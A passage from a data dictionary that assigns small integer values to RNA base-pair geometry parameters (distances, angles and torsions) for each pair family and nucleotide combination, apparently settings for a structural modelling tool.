"cSH_GG_tips_distance":2, "cSH_GG_C1'-B1-B1pair":2, "cSH_GG_B1-B1pair-C1'pair":1, "cSH_GG_C4'-C1'-B1-B1pair":1, "cSH_GG_B1-B1pair-C1'pair-C4'pair":2, "cSH_GG_alpha_1":2, "cSH_GG_alpha_2":1, "cSH_GG_dB1":1, "cSH_GG_dB2":1,
"tSH_GG_tips_distance":2, "tSH_GG_C1'-B1-B1pair":2, "tSH_GG_B1-B1pair-C1'pair":2, "tSH_GG_C4'-C1'-B1-B1pair":2, "tSH_GG_B1-B1pair-C1'pair-C4'pair":2, "tSH_GG_alpha_1":2, "tSH_GG_alpha_2":2, "tSH_GG_dB1":1, "tSH_GG_dB2":2,
"cHS_GG_tips_distance":2, "cHS_GG_C1'-B1-B1pair":1, "cHS_GG_B1-B1pair-C1'pair":2, "cHS_GG_C4'-C1'-B1-B1pair":2, "cHS_GG_B1-B1pair-C1'pair-C4'pair":1, "cHS_GG_alpha_1":1, "cHS_GG_alpha_2":2, "cHS_GG_dB1":1, "cHS_GG_dB2":2,
"tHS_GG_tips_distance":2, "tHS_GG_C1'-B1-B1pair":2, "tHS_GG_B1-B1pair-C1'pair":2, "tHS_GG_C4'-C1'-B1-B1pair":2, "tHS_GG_B1-B1pair-C1'pair-C4'pair":1, "tHS_GG_alpha_1":2, "tHS_GG_alpha_2":3, "tHS_GG_dB1":2, "tHS_GG_dB2":1,
"cSS_GG_tips_distance":2, "cSS_GG_C1'-B1-B1pair":2, "cSS_GG_B1-B1pair-C1'pair":2, "cSS_GG_C4'-C1'-B1-B1pair":1, "cSS_GG_B1-B1pair-C1'pair-C4'pair":1, "cSS_GG_alpha_1":2, "cSS_GG_alpha_2":3, "cSS_GG_dB1":3, "cSS_GG_dB2":5,
"tSS_GG_tips_distance":2, "tSS_GG_C1'-B1-B1pair":3, "tSS_GG_B1-B1pair-C1'pair":2, "tSS_GG_C4'-C1'-B1-B1pair":2, "tSS_GG_B1-B1pair-C1'pair-C4'pair":1, "tSS_GG_alpha_1":1, "tSS_GG_alpha_2":3, "tSS_GG_dB1":3, "tSS_GG_dB2":2,
"cWW_GU_tips_distance":2, "cWW_GU_C1'-B1-B1pair":2, "cWW_GU_B1-B1pair-C1'pair":2, "cWW_GU_C4'-C1'-B1-B1pair":2, "cWW_GU_B1-B1pair-C1'pair-C4'pair":1, "cWW_GU_alpha_1":3, "cWW_GU_alpha_2":2, "cWW_GU_dB1":4, "cWW_GU_dB2":3,
"tWW_GU_tips_distance":2, "tWW_GU_C1'-B1-B1pair":3, "tWW_GU_B1-B1pair-C1'pair":2, "tWW_GU_C4'-C1'-B1-B1pair":2, "tWW_GU_B1-B1pair-C1'pair-C4'pair":3, "tWW_GU_alpha_1":2, "tWW_GU_alpha_2":2, "tWW_GU_dB1":3, "tWW_GU_dB2":3,
"cWH_GU_tips_distance":2, "cWH_GU_C1'-B1-B1pair":1, "cWH_GU_B1-B1pair-C1'pair":2, "cWH_GU_C4'-C1'-B1-B1pair":1, "cWH_GU_B1-B1pair-C1'pair-C4'pair":2, "cWH_GU_alpha_1":2, "cWH_GU_alpha_2":4, "cWH_GU_dB1":3, "cWH_GU_dB2":1,
"tWH_GU_tips_distance":8, "tWH_GU_C1'-B1-B1pair":1, "tWH_GU_B1-B1pair-C1'pair":2, "tWH_GU_C4'-C1'-B1-B1pair":2, "tWH_GU_B1-B1pair-C1'pair-C4'pair":2, "tWH_GU_alpha_1":2, "tWH_GU_alpha_2":2, "tWH_GU_dB1":3, "tWH_GU_dB2":1,
"cHW_GU_tips_distance":4, "cHW_GU_C1'-B1-B1pair":2, "cHW_GU_B1-B1pair-C1'pair":1, "cHW_GU_C4'-C1'-B1-B1pair":2, "cHW_GU_B1-B1pair-C1'pair-C4'pair":2, "cHW_GU_alpha_1":2, "cHW_GU_alpha_2":2, "cHW_GU_dB1":3, "cHW_GU_dB2":3,
"tHW_GU_tips_distance":1, "tHW_GU_C1'-B1-B1pair":3, "tHW_GU_B1-B1pair-C1'pair":1, "tHW_GU_C4'-C1'-B1-B1pair":2, "tHW_GU_B1-B1pair-C1'pair-C4'pair":3, "tHW_GU_alpha_1":3, "tHW_GU_alpha_2":1, "tHW_GU_dB1":2, "tHW_GU_dB2":5,
"cWS_GU_tips_distance":2, "cWS_GU_C1'-B1-B1pair":1, "cWS_GU_B1-B1pair-C1'pair":1, "cWS_GU_C4'-C1'-B1-B1pair":1, "cWS_GU_B1-B1pair-C1'pair-C4'pair":2, "cWS_GU_alpha_1":3, "cWS_GU_alpha_2":3, "cWS_GU_dB1":2, "cWS_GU_dB2":3,
"tWS_GU_tips_distance":4, "tWS_GU_C1'-B1-B1pair":3, "tWS_GU_B1-B1pair-C1'pair":1, "tWS_GU_C4'-C1'-B1-B1pair":3, "tWS_GU_B1-B1pair-C1'pair-C4'pair":2, "tWS_GU_alpha_1":1, "tWS_GU_alpha_2":2, "tWS_GU_dB1":3, "tWS_GU_dB2":3,
"cSW_GU_tips_distance":2, "cSW_GU_C1'-B1-B1pair":2, "cSW_GU_B1-B1pair-C1'pair":2, "cSW_GU_C4'-C1'-B1-B1pair":2, "cSW_GU_B1-B1pair-C1'pair-C4'pair":2, "cSW_GU_alpha_1":1, "cSW_GU_alpha_2":2, "cSW_GU_dB1":3, "cSW_GU_dB2":2,
"tSW_GU_tips_distance":3, "tSW_GU_C1'-B1-B1pair":1, "tSW_GU_B1-B1pair-C1'pair":2, "tSW_GU_C4'-C1'-B1-B1pair":2, "tSW_GU_B1-B1pair-C1'pair-C4'pair":2, "tSW_GU_alpha_1":1, "tSW_GU_alpha_2":2, "tSW_GU_dB1":5, "tSW_GU_dB2":1,
"cHH_GU_tips_distance":5, "cHH_GU_C1'-B1-B1pair":2, "cHH_GU_B1-B1pair-C1'pair":3, "cHH_GU_C4'-C1'-B1-B1pair":2, "cHH_GU_B1-B1pair-C1'pair-C4'pair":2, "cHH_GU_alpha_1":2, "cHH_GU_alpha_2":2, "cHH_GU_dB1":5, "cHH_GU_dB2":3,
"tHH_GU_tips_distance":5, "tHH_GU_C1'-B1-B1pair":2, "tHH_GU_B1-B1pair-C1'pair":1, "tHH_GU_C4'-C1'-B1-B1pair":1, "tHH_GU_B1-B1pair-C1'pair-C4'pair":2, "tHH_GU_alpha_1":2, "tHH_GU_alpha_2":1, "tHH_GU_dB1":8, "tHH_GU_dB2":2,
"cSH_GU_tips_distance":3, "cSH_GU_C1'-B1-B1pair":1, "cSH_GU_B1-B1pair-C1'pair":2, "cSH_GU_C4'-C1'-B1-B1pair":3, "cSH_GU_B1-B1pair-C1'pair-C4'pair":2, "cSH_GU_alpha_1":2, "cSH_GU_alpha_2":1, "cSH_GU_dB1":2, "cSH_GU_dB2":2,
"tSH_GU_tips_distance":2, "tSH_GU_C1'-B1-B1pair":2, "tSH_GU_B1-B1pair-C1'pair":2, "tSH_GU_C4'-C1'-B1-B1pair":1, "tSH_GU_B1-B1pair-C1'pair-C4'pair":1, "tSH_GU_alpha_1":2, "tSH_GU_alpha_2":3, "tSH_GU_dB1":3, "tSH_GU_dB2":3,
"cHS_GU_tips_distance":8, "cHS_GU_C1'-B1-B1pair":1, "cHS_GU_B1-B1pair-C1'pair":1, "cHS_GU_C4'-C1'-B1-B1pair":2, "cHS_GU_B1-B1pair-C1'pair-C4'pair":2, "cHS_GU_alpha_1":1, "cHS_GU_alpha_2":1, "cHS_GU_dB1":4, "cHS_GU_dB2":3,
"tHS_GU_tips_distance":5, "tHS_GU_C1'-B1-B1pair":4, "tHS_GU_B1-B1pair-C1'pair":2, "tHS_GU_C4'-C1'-B1-B1pair":2, "tHS_GU_B1-B1pair-C1'pair-C4'pair":1, "tHS_GU_alpha_1":2, "tHS_GU_alpha_2":1, "tHS_GU_dB1":1, "tHS_GU_dB2":3,
"cSS_GU_tips_distance":2, "cSS_GU_C1'-B1-B1pair":3, "cSS_GU_B1-B1pair-C1'pair":2, "cSS_GU_C4'-C1'-B1-B1pair":2, "cSS_GU_B1-B1pair-C1'pair-C4'pair":2, "cSS_GU_alpha_1":2, "cSS_GU_alpha_2":1, "cSS_GU_dB1":3, "cSS_GU_dB2":4,
"tSS_GU_tips_distance":5, "tSS_GU_C1'-B1-B1pair":2, "tSS_GU_B1-B1pair-C1'pair":2, "tSS_GU_C4'-C1'-B1-B1pair":1, "tSS_GU_B1-B1pair-C1'pair-C4'pair":3, "tSS_GU_alpha_1":2, "tSS_GU_alpha_2":2, "tSS_GU_dB1":2, "tSS_GU_dB2":6,
"cWW_UA_tips_distance":4, "cWW_UA_C1'-B1-B1pair":2, "cWW_UA_B1-B1pair-C1'pair":2, "cWW_UA_C4'-C1'-B1-B1pair":1, "cWW_UA_B1-B1pair-C1'pair-C4'pair":2, "cWW_UA_alpha_1":2, "cWW_UA_alpha_2":2, "cWW_UA_dB1":2, "cWW_UA_dB2":7,
"tWW_UA_tips_distance":2, "tWW_UA_C1'-B1-B1pair":1, "tWW_UA_B1-B1pair-C1'pair":2, "tWW_UA_C4'-C1'-B1-B1pair":2, "tWW_UA_B1-B1pair-C1'pair-C4'pair":1, "tWW_UA_alpha_1":2, "tWW_UA_alpha_2":1, "tWW_UA_dB1":6, "tWW_UA_dB2":1,
"cWH_UA_tips_distance":3, "cWH_UA_C1'-B1-B1pair":3, "cWH_UA_B1-B1pair-C1'pair":3, "cWH_UA_C4'-C1'-B1-B1pair":3, "cWH_UA_B1-B1pair-C1'pair-C4'pair":2, "cWH_UA_alpha_1":2, "cWH_UA_alpha_2":3, "cWH_UA_dB1":4, "cWH_UA_dB2":3,
"tWH_UA_tips_distance":3, "tWH_UA_C1'-B1-B1pair":2, "tWH_UA_B1-B1pair-C1'pair":1, "tWH_UA_C4'-C1'-B1-B1pair":2, "tWH_UA_B1-B1pair-C1'pair-C4'pair":2, "tWH_UA_alpha_1":1, "tWH_UA_alpha_2":2, "tWH_UA_dB1":3, "tWH_UA_dB2":2,
"cHW_UA_tips_distance":5, "cHW_UA_C1'-B1-B1pair":1, "cHW_UA_B1-B1pair-C1'pair":1, "cHW_UA_C4'-C1'-B1-B1pair":3, "cHW_UA_B1-B1pair-C1'pair-C4'pair":1, "cHW_UA_alpha_1":1, "cHW_UA_alpha_2":1, "cHW_UA_dB1":3, "cHW_UA_dB2":1,
"tHW_UA_tips_distance":7, "tHW_UA_C1'-B1-B1pair":3, "tHW_UA_B1-B1pair-C1'pair":2, "tHW_UA_C4'-C1'-B1-B1pair":1, "tHW_UA_B1-B1pair-C1'pair-C4'pair":2, "tHW_UA_alpha_1":3, "tHW_UA_alpha_2":3, "tHW_UA_dB1":2, "tHW_UA_dB2":1,
"cWS_UA_tips_distance":1, "cWS_UA_C1'-B1-B1pair":2, "cWS_UA_B1-B1pair-C1'pair":3, "cWS_UA_C4'-C1'-B1-B1pair":2, "cWS_UA_B1-B1pair-C1'pair-C4'pair":1, "cWS_UA_alpha_1":2, "cWS_UA_alpha_2":2, "cWS_UA_dB1":3, "cWS_UA_dB2":4,
"tWS_UA_tips_distance":5, "tWS_UA_C1'-B1-B1pair":1, "tWS_UA_B1-B1pair-C1'pair":2, "tWS_UA_C4'-C1'-B1-B1pair":2, "tWS_UA_B1-B1pair-C1'pair-C4'pair":1, "tWS_UA_alpha_1":1, "tWS_UA_alpha_2":3, "tWS_UA_dB1":1, "tWS_UA_dB2":1,
"cSW_UA_tips_distance":2, "cSW_UA_C1'-B1-B1pair":1, "cSW_UA_B1-B1pair-C1'pair":1, "cSW_UA_C4'-C1'-B1-B1pair":2, "cSW_UA_B1-B1pair-C1'pair-C4'pair":2, "cSW_UA_alpha_1":2, "cSW_UA_alpha_2":3, "cSW_UA_dB1":3, "cSW_UA_dB2":3,
"tSW_UA_tips_distance":2, "tSW_UA_C1'-B1-B1pair":1, "tSW_UA_B1-B1pair-C1'pair":2, "tSW_UA_C4'-C1'-B1-B1pair":1, "tSW_UA_B1-B1pair-C1'pair-C4'pair":1, "tSW_UA_alpha_1":2, "tSW_UA_alpha_2":2, "tSW_UA_dB1":3, "tSW_UA_dB2":2,
"cHH_UA_tips_distance":4, "cHH_UA_C1'-B1-B1pair":1, "cHH_UA_B1-B1pair-C1'pair":1, "cHH_UA_C4'-C1'-B1-B1pair":1, "cHH_UA_B1-B1pair-C1'pair-C4'pair":2, "cHH_UA_alpha_1":2, "cHH_UA_alpha_2":2, "cHH_UA_dB1":5, "cHH_UA_dB2":2,
"tHH_UA_tips_distance":4, "tHH_UA_C1'-B1-B1pair":2, "tHH_UA_B1-B1pair-C1'pair":2, "tHH_UA_C4'-C1'-B1-B1pair":2, "tHH_UA_B1-B1pair-C1'pair-C4'pair":2, "tHH_UA_alpha_1":2, "tHH_UA_alpha_2":3, "tHH_UA_dB1":3, "tHH_UA_dB2":1,
"cSH_UA_tips_distance":4, "cSH_UA_C1'-B1-B1pair":1, "cSH_UA_B1-B1pair-C1'pair":1, "cSH_UA_C4'-C1'-B1-B1pair":2, "cSH_UA_B1-B1pair-C1'pair-C4'pair":2, "cSH_UA_alpha_1":2, "cSH_UA_alpha_2":2, "cSH_UA_dB1":3, "cSH_UA_dB2":2,
"tSH_UA_tips_distance":2, "tSH_UA_C1'-B1-B1pair":2, "tSH_UA_B1-B1pair-C1'pair":2, "tSH_UA_C4'-C1'-B1-B1pair":3, "tSH_UA_B1-B1pair-C1'pair-C4'pair":2, "tSH_UA_alpha_1":3, "tSH_UA_alpha_2":2, "tSH_UA_dB1":4, "tSH_UA_dB2":1,
"cHS_UA_tips_distance":5, "cHS_UA_C1'-B1-B1pair":2, "cHS_UA_B1-B1pair-C1'pair":2, "cHS_UA_C4'-C1'-B1-B1pair":2, "cHS_UA_B1-B1pair-C1'pair-C4'pair":2, "cHS_UA_alpha_1":2, "cHS_UA_alpha_2":2, "cHS_UA_dB1":1, "cHS_UA_dB2":3,
"tHS_UA_tips_distance":5, "tHS_UA_C1'-B1-B1pair":2, "tHS_UA_B1-B1pair-C1'pair":2, "tHS_UA_C4'-C1'-B1-B1pair":3, "tHS_UA_B1-B1pair-C1'pair-C4'pair":1, "tHS_UA_alpha_1":3, "tHS_UA_alpha_2":3, "tHS_UA_dB1":2, "tHS_UA_dB2":7,
"cSS_UA_tips_distance":2, "cSS_UA_C1'-B1-B1pair":2, "cSS_UA_B1-B1pair-C1'pair":2, "cSS_UA_C4'-C1'-B1-B1pair":2, "cSS_UA_B1-B1pair-C1'pair-C4'pair":1, "cSS_UA_alpha_1":1, "cSS_UA_alpha_2":1, "cSS_UA_dB1":2, "cSS_UA_dB2":1,
"tSS_UA_tips_distance":5, "tSS_UA_C1'-B1-B1pair":1, "tSS_UA_B1-B1pair-C1'pair":3, "tSS_UA_C4'-C1'-B1-B1pair":2, "tSS_UA_B1-B1pair-C1'pair-C4'pair":3, "tSS_UA_alpha_1":2, "tSS_UA_alpha_2":2, "tSS_UA_dB1":4, "tSS_UA_dB2":4,
"cWW_UC_tips_distance":3, "cWW_UC_C1'-B1-B1pair":1, "cWW_UC_B1-B1pair-C1'pair":2, "cWW_UC_C4'-C1'-B1-B1pair":2, "cWW_UC_B1-B1pair-C1'pair-C4'pair":2, "cWW_UC_alpha_1":2, "cWW_UC_alpha_2":1, "cWW_UC_dB1":1, "cWW_UC_dB2":2,
"tWW_UC_tips_distance":4, "tWW_UC_C1'-B1-B1pair":2, "tWW_UC_B1-B1pair-C1'pair":2, "tWW_UC_C4'-C1'-B1-B1pair":2, "tWW_UC_B1-B1pair-C1'pair-C4'pair":2, "tWW_UC_alpha_1":3, "tWW_UC_alpha_2":1, "tWW_UC_dB1":1, "tWW_UC_dB2":4,
"cWH_UC_tips_distance":2, "cWH_UC_C1'-B1-B1pair":2, "cWH_UC_B1-B1pair-C1'pair":2, "cWH_UC_C4'-C1'-B1-B1pair":2, "cWH_UC_B1-B1pair-C1'pair-C4'pair":4, "cWH_UC_alpha_1":2, "cWH_UC_alpha_2":3, "cWH_UC_dB1":3, "cWH_UC_dB2":3,
"tWH_UC_tips_distance":4, "tWH_UC_C1'-B1-B1pair":3, "tWH_UC_B1-B1pair-C1'pair":2, "tWH_UC_C4'-C1'-B1-B1pair":3, "tWH_UC_B1-B1pair-C1'pair-C4'pair":1, "tWH_UC_alpha_1":4, "tWH_UC_alpha_2":1, "tWH_UC_dB1":4, "tWH_UC_dB2":2,
"cHW_UC_tips_distance":5, "cHW_UC_C1'-B1-B1pair":2, "cHW_UC_B1-B1pair-C1'pair":2, "cHW_UC_C4'-C1'-B1-B1pair":1, "cHW_UC_B1-B1pair-C1'pair-C4'pair":2, "cHW_UC_alpha_1":2, "cHW_UC_alpha_2":2, "cHW_UC_dB1":2, "cHW_UC_dB2":6,
"tHW_UC_tips_distance":2, "tHW_UC_C1'-B1-B1pair":2, "tHW_UC_B1-B1pair-C1'pair":2, "tHW_UC_C4'-C1'-B1-B1pair":3, "tHW_UC_B1-B1pair-C1'pair-C4'pair":2, "tHW_UC_alpha_1":2, "tHW_UC_alpha_2":4, "tHW_UC_dB1":4, "tHW_UC_dB2":4,
"cWS_UC_tips_distance":4, "cWS_UC_C1'-B1-B1pair":2, "cWS_UC_B1-B1pair-C1'pair":2, "cWS_UC_C4'-C1'-B1-B1pair":2, "cWS_UC_B1-B1pair-C1'pair-C4'pair":2, "cWS_UC_alpha_1":3, "cWS_UC_alpha_2":2, "cWS_UC_dB1":3, "cWS_UC_dB2":2,
"tWS_UC_tips_distance":4, "tWS_UC_C1'-B1-B1pair":2, "tWS_UC_B1-B1pair-C1'pair":1, "tWS_UC_C4'-C1'-B1-B1pair":2, "tWS_UC_B1-B1pair-C1'pair-C4'pair":2, "tWS_UC_alpha_1":2, "tWS_UC_alpha_2":1, "tWS_UC_dB1":3, "tWS_UC_dB2":2,
"cSW_UC_tips_distance":4, "cSW_UC_C1'-B1-B1pair":1, "cSW_UC_B1-B1pair-C1'pair":2, "cSW_UC_C4'-C1'-B1-B1pair":2, "cSW_UC_B1-B1pair-C1'pair-C4'pair":2, "cSW_UC_alpha_1":2, "cSW_UC_alpha_2":3, "cSW_UC_dB1":3, "cSW_UC_dB2":6,
"tSW_UC_tips_distance":5, "tSW_UC_C1'-B1-B1pair":1, "tSW_UC_B1-B1pair-C1'pair":2, "tSW_UC_C4'-C1'-B1-B1pair":3, "tSW_UC_B1-B1pair-C1'pair-C4'pair":1, "tSW_UC_alpha_1":2, "tSW_UC_alpha_2":2, "tSW_UC_dB1":2, "tSW_UC_dB2":1,
"cHH_UC_tips_distance":5, "cHH_UC_C1'-B1-B1pair":2, "cHH_UC_B1-B1pair-C1'pair":1, "cHH_UC_C4'-C1'-B1-B1pair":2, "cHH_UC_B1-B1pair-C1'pair-C4'pair":2, "cHH_UC_alpha_1":1, "cHH_UC_alpha_2":3, "cHH_UC_dB1":7, "cHH_UC_dB2":3,
"tHH_UC_tips_distance":5, "tHH_UC_C1'-B1-B1pair":1, "tHH_UC_B1-B1pair-C1'pair":1, "tHH_UC_C4'-C1'-B1-B1pair":2, "tHH_UC_B1-B1pair-C1'pair-C4'pair":3, "tHH_UC_alpha_1":2, "tHH_UC_alpha_2":2, "tHH_UC_dB1":8, "tHH_UC_dB2":8,
"cSH_UC_tips_distance":5, "cSH_UC_C1'-B1-B1pair":2, "cSH_UC_B1-B1pair-C1'pair":2, "cSH_UC_C4'-C1'-B1-B1pair":2, "cSH_UC_B1-B1pair-C1'pair-C4'pair":1, "cSH_UC_alpha_1":2, "cSH_UC_alpha_2":3, "cSH_UC_dB1":5, "cSH_UC_dB2":3,
"tSH_UC_tips_distance":2, "tSH_UC_C1'-B1-B1pair":1, "tSH_UC_B1-B1pair-C1'pair":1, "tSH_UC_C4'-C1'-B1-B1pair":2, "tSH_UC_B1-B1pair-C1'pair-C4'pair":1, "tSH_UC_alpha_1":2, "tSH_UC_alpha_2":2, "tSH_UC_dB1":2, "tSH_UC_dB2":7,
"cHS_UC_tips_distance":5, "cHS_UC_C1'-B1-B1pair":2, "cHS_UC_B1-B1pair-C1'pair":2, "cHS_UC_C4'-C1'-B1-B1pair":1, "cHS_UC_B1-B1pair-C1'pair-C4'pair":3, "cHS_UC_alpha_1":3, "cHS_UC_alpha_2":2, "cHS_UC_dB1":6, "cHS_UC_dB2":7,
"tHS_UC_tips_distance":5, "tHS_UC_C1'-B1-B1pair":3, "tHS_UC_B1-B1pair-C1'pair":2, "tHS_UC_C4'-C1'-B1-B1pair":2, "tHS_UC_B1-B1pair-C1'pair-C4'pair":3, "tHS_UC_alpha_1":3, "tHS_UC_alpha_2":1, "tHS_UC_dB1":5, "tHS_UC_dB2":7,
"cSS_UC_tips_distance":5, "cSS_UC_C1'-B1-B1pair":2, "cSS_UC_B1-B1pair-C1'pair":1, "cSS_UC_C4'-C1'-B1-B1pair":3, "cSS_UC_B1-B1pair-C1'pair-C4'pair":1, "cSS_UC_alpha_1":3, "cSS_UC_alpha_2":3, "cSS_UC_dB1":8, "cSS_UC_dB2":5,
"tSS_UC_tips_distance":5, "tSS_UC_C1'-B1-B1pair":2, "tSS_UC_B1-B1pair-C1'pair":1, "tSS_UC_C4'-C1'-B1-B1pair":3, "tSS_UC_B1-B1pair-C1'pair-C4'pair":3, "tSS_UC_alpha_1":3, "tSS_UC_alpha_2":1, "tSS_UC_dB1":8, "tSS_UC_dB2":7,
"cWW_UG_tips_distance":3, "cWW_UG_C1'-B1-B1pair":2, "cWW_UG_B1-B1pair-C1'pair":3, "cWW_UG_C4'-C1'-B1-B1pair":2, "cWW_UG_B1-B1pair-C1'pair-C4'pair":2, "cWW_UG_alpha_1":2, "cWW_UG_alpha_2":3, "cWW_UG_dB1":4, "cWW_UG_dB2":3,
"tWW_UG_tips_distance":2, "tWW_UG_C1'-B1-B1pair":1, "tWW_UG_B1-B1pair-C1'pair":1, "tWW_UG_C4'-C1'-B1-B1pair":2, "tWW_UG_B1-B1pair-C1'pair-C4'pair":2, "tWW_UG_alpha_1":3, "tWW_UG_alpha_2":3, "tWW_UG_dB1":3, "tWW_UG_dB2":4,
"cWH_UG_tips_distance":2, "cWH_UG_C1'-B1-B1pair":1, "cWH_UG_B1-B1pair-C1'pair":2, "cWH_UG_C4'-C1'-B1-B1pair":2, "cWH_UG_B1-B1pair-C1'pair-C4'pair":2, "cWH_UG_alpha_1":2, "cWH_UG_alpha_2":2, "cWH_UG_dB1":2, "cWH_UG_dB2":2,
"tWH_UG_tips_distance":1, "tWH_UG_C1'-B1-B1pair":2, "tWH_UG_B1-B1pair-C1'pair":2, "tWH_UG_C4'-C1'-B1-B1pair":2, "tWH_UG_B1-B1pair-C1'pair-C4'pair":2, "tWH_UG_alpha_1":2, "tWH_UG_alpha_2":2, "tWH_UG_dB1":6, "tWH_UG_dB2":2,
"cHW_UG_tips_distance":2, "cHW_UG_C1'-B1-B1pair":2, "cHW_UG_B1-B1pair-C1'pair":2, "cHW_UG_C4'-C1'-B1-B1pair":1, "cHW_UG_B1-B1pair-C1'pair-C4'pair":2, "cHW_UG_alpha_1":1, "cHW_UG_alpha_2":2, "cHW_UG_dB1":4, "cHW_UG_dB2":4,
"tHW_UG_tips_distance":1, "tHW_UG_C1'-B1-B1pair":2, "tHW_UG_B1-B1pair-C1'pair":1, "tHW_UG_C4'-C1'-B1-B1pair":2, "tHW_UG_B1-B1pair-C1'pair-C4'pair":2, "tHW_UG_alpha_1":3, "tHW_UG_alpha_2":2, "tHW_UG_dB1":6, "tHW_UG_dB2":3,
"cWS_UG_tips_distance":2, "cWS_UG_C1'-B1-B1pair":4, "cWS_UG_B1-B1pair-C1'pair":2, "cWS_UG_C4'-C1'-B1-B1pair":3, "cWS_UG_B1-B1pair-C1'pair-C4'pair":2, "cWS_UG_alpha_1":2, "cWS_UG_alpha_2":2, "cWS_UG_dB1":2, "cWS_UG_dB2":2,
"tWS_UG_tips_distance":5, "tWS_UG_C1'-B1-B1pair":2, "tWS_UG_B1-B1pair-C1'pair":2, "tWS_UG_C4'-C1'-B1-B1pair":2, "tWS_UG_B1-B1pair-C1'pair-C4'pair":2, "tWS_UG_alpha_1":2, "tWS_UG_alpha_2":1, "tWS_UG_dB1":3, "tWS_UG_dB2":5,
"cSW_UG_tips_distance":2, "cSW_UG_C1'-B1-B1pair":2, "cSW_UG_B1-B1pair-C1'pair":3, "cSW_UG_C4'-C1'-B1-B1pair":2, "cSW_UG_B1-B1pair-C1'pair-C4'pair":1, "cSW_UG_alpha_1":2, "cSW_UG_alpha_2":2, "cSW_UG_dB1":3, "cSW_UG_dB2":2,
"tSW_UG_tips_distance":4, "tSW_UG_C1'-B1-B1pair":1, "tSW_UG_B1-B1pair-C1'pair":1, "tSW_UG_C4'-C1'-B1-B1pair":2, "tSW_UG_B1-B1pair-C1'pair-C4'pair":3, "tSW_UG_alpha_1":2, "tSW_UG_alpha_2":2, "tSW_UG_dB1":2, "tSW_UG_dB2":2,
"cHH_UG_tips_distance":5, "cHH_UG_C1'-B1-B1pair":3, "cHH_UG_B1-B1pair-C1'pair":2, "cHH_UG_C4'-C1'-B1-B1pair":2, "cHH_UG_B1-B1pair-C1'pair-C4'pair":2, "cHH_UG_alpha_1":2, "cHH_UG_alpha_2":3, "cHH_UG_dB1":4, "cHH_UG_dB2":5,
"tHH_UG_tips_distance":5, "tHH_UG_C1'-B1-B1pair":2, "tHH_UG_B1-B1pair-C1'pair":2, "tHH_UG_C4'-C1'-B1-B1pair":2, "tHH_UG_B1-B1pair-C1'pair-C4'pair":3, "tHH_UG_alpha_1":3, "tHH_UG_alpha_2":2, "tHH_UG_dB1":3, "tHH_UG_dB2":2,
"cSH_UG_tips_distance":5, "cSH_UG_C1'-B1-B1pair":1, "cSH_UG_B1-B1pair-C1'pair":2, "cSH_UG_C4'-C1'-B1-B1pair":2, "cSH_UG_B1-B1pair-C1'pair-C4'pair":2, "cSH_UG_alpha_1":2, "cSH_UG_alpha_2":2, "cSH_UG_dB1":3, "cSH_UG_dB2":4,
"tSH_UG_tips_distance":5, "tSH_UG_C1'-B1-B1pair":2, "tSH_UG_B1-B1pair-C1'pair":1, "tSH_UG_C4'-C1'-B1-B1pair":2, "tSH_UG_B1-B1pair-C1'pair-C4'pair":1, "tSH_UG_alpha_1":3, "tSH_UG_alpha_2":1, "tSH_UG_dB1":2, "tSH_UG_dB2":2,
"cHS_UG_tips_distance":3, "cHS_UG_C1'-B1-B1pair":2, "cHS_UG_B1-B1pair-C1'pair":3, "cHS_UG_C4'-C1'-B1-B1pair":2, "cHS_UG_B1-B1pair-C1'pair-C4'pair":4, "cHS_UG_alpha_1":2, "cHS_UG_alpha_2":3, "cHS_UG_dB1":3, "cHS_UG_dB2":4,
"tHS_UG_tips_distance":7, "tHS_UG_C1'-B1-B1pair":1, "tHS_UG_B1-B1pair-C1'pair":3, "tHS_UG_C4'-C1'-B1-B1pair":2, "tHS_UG_B1-B1pair-C1'pair-C4'pair":1, "tHS_UG_alpha_1":2, "tHS_UG_alpha_2":3, "tHS_UG_dB1":2, "tHS_UG_dB2":1,
"cSS_UG_tips_distance":2, "cSS_UG_C1'-B1-B1pair":2, "cSS_UG_B1-B1pair-C1'pair":2, "cSS_UG_C4'-C1'-B1-B1pair":2, "cSS_UG_B1-B1pair-C1'pair-C4'pair":2, "cSS_UG_alpha_1":1, "cSS_UG_alpha_2":2, "cSS_UG_dB1":2, "cSS_UG_dB2":3,
"tSS_UG_tips_distance":5, "tSS_UG_C1'-B1-B1pair":2, "tSS_UG_B1-B1pair-C1'pair":2, "tSS_UG_C4'-C1'-B1-B1pair":1, "tSS_UG_B1-B1pair-C1'pair-C4'pair":2, "tSS_UG_alpha_1":2, "tSS_UG_alpha_2":2, "tSS_UG_dB1":3, "tSS_UG_dB2":4,
"cWW_UU_tips_distance":1, "cWW_UU_C1'-B1-B1pair":2, "cWW_UU_B1-B1pair-C1'pair":3, "cWW_UU_C4'-C1'-B1-B1pair":3, "cWW_UU_B1-B1pair-C1'pair-C4'pair":2, "cWW_UU_alpha_1":2, "cWW_UU_alpha_2":2, "cWW_UU_dB1":2, "cWW_UU_dB2":1,
"tWW_UU_tips_distance":3, "tWW_UU_C1'-B1-B1pair":2, "tWW_UU_B1-B1pair-C1'pair":2, "tWW_UU_C4'-C1'-B1-B1pair":2, "tWW_UU_B1-B1pair-C1'pair-C4'pair":2, "tWW_UU_alpha_1":2, "tWW_UU_alpha_2":2, "tWW_UU_dB1":4, "tWW_UU_dB2":5,
"cWH_UU_tips_distance":2, "cWH_UU_C1'-B1-B1pair":2, "cWH_UU_B1-B1pair-C1'pair":2, "cWH_UU_C4'-C1'-B1-B1pair":3, "cWH_UU_B1-B1pair-C1'pair-C4'pair":3, "cWH_UU_alpha_1":2, "cWH_UU_alpha_2":3, "cWH_UU_dB1":3, "cWH_UU_dB2":5,
"tWH_UU_tips_distance":3, "tWH_UU_C1'-B1-B1pair":2, "tWH_UU_B1-B1pair-C1'pair":2, "tWH_UU_C4'-C1'-B1-B1pair":2, "tWH_UU_B1-B1pair-C1'pair-C4'pair":2, "tWH_UU_alpha_1":3, "tWH_UU_alpha_2":3, "tWH_UU_dB1":2, "tWH_UU_dB2":2,
"cHW_UU_tips_distance":1, "cHW_UU_C1'-B1-B1pair":2, "cHW_UU_B1-B1pair-C1'pair":3, "cHW_UU_C4'-C1'-B1-B1pair":1, "cHW_UU_B1-B1pair-C1'pair-C4'pair":3, "cHW_UU_alpha_1":2, "cHW_UU_alpha_2":2, "cHW_UU_dB1":3, "cHW_UU_dB2":4,
